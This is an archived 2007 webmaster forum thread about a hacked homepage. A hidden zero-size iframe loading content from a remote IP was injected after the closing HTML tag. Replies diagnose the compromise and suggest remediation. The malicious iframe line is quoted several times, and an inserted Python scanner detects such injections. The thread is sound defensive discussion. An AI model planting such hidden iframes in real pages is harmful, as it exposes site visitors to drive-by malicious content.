Strange code appears when validating


Duz

Dec 4, 2007, 11:19:18 AM
to Only Validation + Navigation = Crawlability
Webado, Another problem!!

This morning, I went back and validated my opening page
<www.toiletology.com/index.shtml> and got an error. When I look at
the source code error it appears to be something that is not in my
page at all. It is below the closing body and html codes. A search
on Google for 116.0.103.105 returns a foreign page. The translated
page appears to be a blog but is garbled but you can make out that
they are talking about "infected" pages. I looked at a few other
pages, but it seems it is only on the index.shtml page.

What to do?

DUZ
www.toiletology.com
www.fixitips.com

=================================================================

</body>
</html>
<iframe src='http://116.0.103.105/reflinks/' width='0' height='0'></iframe>

=================================================================

Where the traffic flows, the webmaster watches - Scouts' Forum ...
- [ Translate this page ]
... "_ttp://116.0.103.105/reflinks/". The frame is hidden, since its
width and height are equal to zero (width='0' height='0')
(IMG:style_emoticons/default/smile13.gif) ...
it2b-forum.ru/index.php?showtopic=4084&view=getlastpost - 99k - Cached
- Similar pages - Note this

Christina S

Dec 4, 2007, 11:48:23 AM
to only-va...@googlegroups.com
Ok, somebody inserted this crap:

<iframe src='http://116.0.103.105/reflinks/' width='0' height='0'></iframe>

You've been hacked it seems.

This also triggers alarms from IE - of malicious code or something.

Use an FTP program and check to see what might be. Check source codes of
your index page.

Check the .htaccess file. Check in all folders, including those for
Frontpage extensions (even if you don't use FP).


It's I'm afraid a hack through Frontpage extensions - those are known to be
vulnerable.

Call your hoster. Most probably it is at the server level.

It's serious.

Christina
www.webado.net

Christina S

Dec 4, 2007, 11:54:10 AM
to only-va...@googlegroups.com
It seems just index.shtml has been hacked.

http://web-sniffer.net/?url=http%3A%2F%2Fwww.toiletology.com%2Findex.shtml&submit=Submit&http=1.1&gzip=yes&type=GET&uak=0

Look at the bottom.

Whereas if you test another page like intro.shtml you won't find that.

Check the version you have on your pc. If it's clean, with nothing after the
</html> tag, upload it to replace the one on the server.
Upload only that file, not the whole site.

If you are using Frontpage, here's bad news: stop.

Change your passwords.

Check server logs.

Call your hoster.


Christina
www.webado.net

----- Original Message -----
From: "Duz" <kay.k...@ayrlawn.com>
To: "Only Validation + Navigation = Crawlability"
<only-va...@googlegroups.com>
Sent: Tuesday, December 04, 2007 11:19 AM
Subject: Only Validation Strange code appears when validating

Christina S

Dec 4, 2007, 11:59:13 AM
to only-va...@googlegroups.com
http://whois.domaintools.com/116.0.103.105

Malaysia.
A home server it seems.

Sneaky.

Maybe send an email to abouse [@] globaltransit.net - explain the user using
this ip is involved in a site hacking.


Currently all that that iframe holds is these characters, no html code:

^_~Supposed to say, hey, look at me I hacked you. Yeah, right, real
community conscious.


Christina
www.webado.net


webado

Dec 4, 2007, 12:08:47 PM
to Only Validation + Navigation = Crawlability
Sorry, that email is for abuse [@] globaltransit.net .

Duz

Dec 4, 2007, 4:58:18 PM
to Only Validation + Navigation = Crawlability
Thanks again Webado,
I uploaded the files off my computer and that cleaned up the files on
the server. Another reason to validate pages; had I not validated I
would never have found this hack. I think it happened only a few days
ago. I haven't found any other pages involved. Is there any way to
protect a site from this problem?

Duz
www.toiletology.com
www.fixitips.com

webado

Dec 4, 2007, 5:09:09 PM
to Only Validation + Navigation = Crawlability
Well they had to have had access through something.

Either your user id & password are easy to guess (so you change the
password), or you have unsecured access points.

Or the entire server is compromised - and you had better talk to your
hoster pronto.

They should either get rid of Frontpage extensions or at least apply
the patches that tighten security. As server admins they should be
aware of this.

You should really check all the folders, all the files.
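
One way to automate the check described in this thread (nothing after the closing </html> tag, no zero-size frames) over a downloaded copy of every folder of the site. This is an added example, not code from any poster; the extension list and the names check_page and scan_tree are assumptions, and the two sample pages are constructed.

```python
import os
import re
import sys
import time

PAGE_EXTS = (".html", ".htm", ".shtml", ".php")
CLOSE_HTML = re.compile(r"</html\s*>", re.I)
IFRAME = re.compile(r"<iframe\b[^>]*>", re.I)
ZERO_DIM = re.compile(r"""\b(?:width|height)\s*=\s*['"]?0(?:px)?['"]?(?=[\s>/]|$)""", re.I)

# Constructed samples: a clean page, and the same page with the frame quoted in the thread.
CLEAN = "<html><body><p>Hello</p></body>\n</html>\n"
INFECTED = CLEAN + "<iframe src='http://116.0.103.105/reflinks/' width='0' height='0'></iframe>\n"


def check_page(text):
    """Return (kind, detail) findings for one page's source text."""
    findings = []
    closes = list(CLOSE_HTML.finditer(text))
    if closes:
        trailing = text[closes[-1].end():].strip()
        if trailing:  # anything but whitespace after the last </html>
            findings.append(("content after </html>", trailing[:120]))
    for tag in IFRAME.findall(text):
        if ZERO_DIM.search(tag):  # frame the visitor cannot see
            findings.append(("zero-size iframe", tag))
    return findings


def scan_tree(root):
    """Walk root and return (path, modified date, findings) for each flagged page."""
    flagged = []
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(PAGE_EXTS):
                continue
            path = os.path.join(folder, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings = check_page(fh.read())
            if findings:
                stamp = time.strftime("%Y-%m-%d", time.localtime(os.path.getmtime(path)))
                flagged.append((path, stamp, findings))
    return flagged


if __name__ == "__main__":
    for path, stamp, findings in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        for kind, detail in findings:
            print(f"{path} (modified {stamp}): {kind}: {detail}")
```

The modified date is printed because pages changed on a day nobody edited the site are worth a look even when the pattern check finds nothing.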

Duz

Dec 8, 2007, 7:03:18 PM
to Only Validation + Navigation = Crawlability
Hi Webado,

It took a few days, but my hosting service finally came back to me and
said that they had checked all the other domains on their servers and
couldn't find any others that had been corrupted. All four of our
domains had that line of code after the closing </body></html>
statements. When I was uploading the clean pages I noticed that the
files on the server were dated 30 Nov 2007 ( Friday a week ago). Two
of those domains, I haven't touched for months. I've changed the
passwords for all the domains. Not sure what else can be done, except
to keep validating.

I'm getting a bit paranoid I think. Our Google revenue has dropped
off quite a bit and I'm wondering if it could have anything to do with
that invasion.
Duz
www.toiletology.com
www.fixitips.com

webado

Dec 8, 2007, 7:41:39 PM
to Only Validation + Navigation = Crawlability
Well your main site's homepages has been re-cached freshly on December
6th (or at least the homepage has). Keep an eye on it.
The other site's homepage has not been re-cached yet, so the cache
still has that iframe in its source code.

I doubt any drop in Google revenue would be due to this incident. More
likely a seasonal drop. Christmas is coming, people are less concerned
with this stuff probably.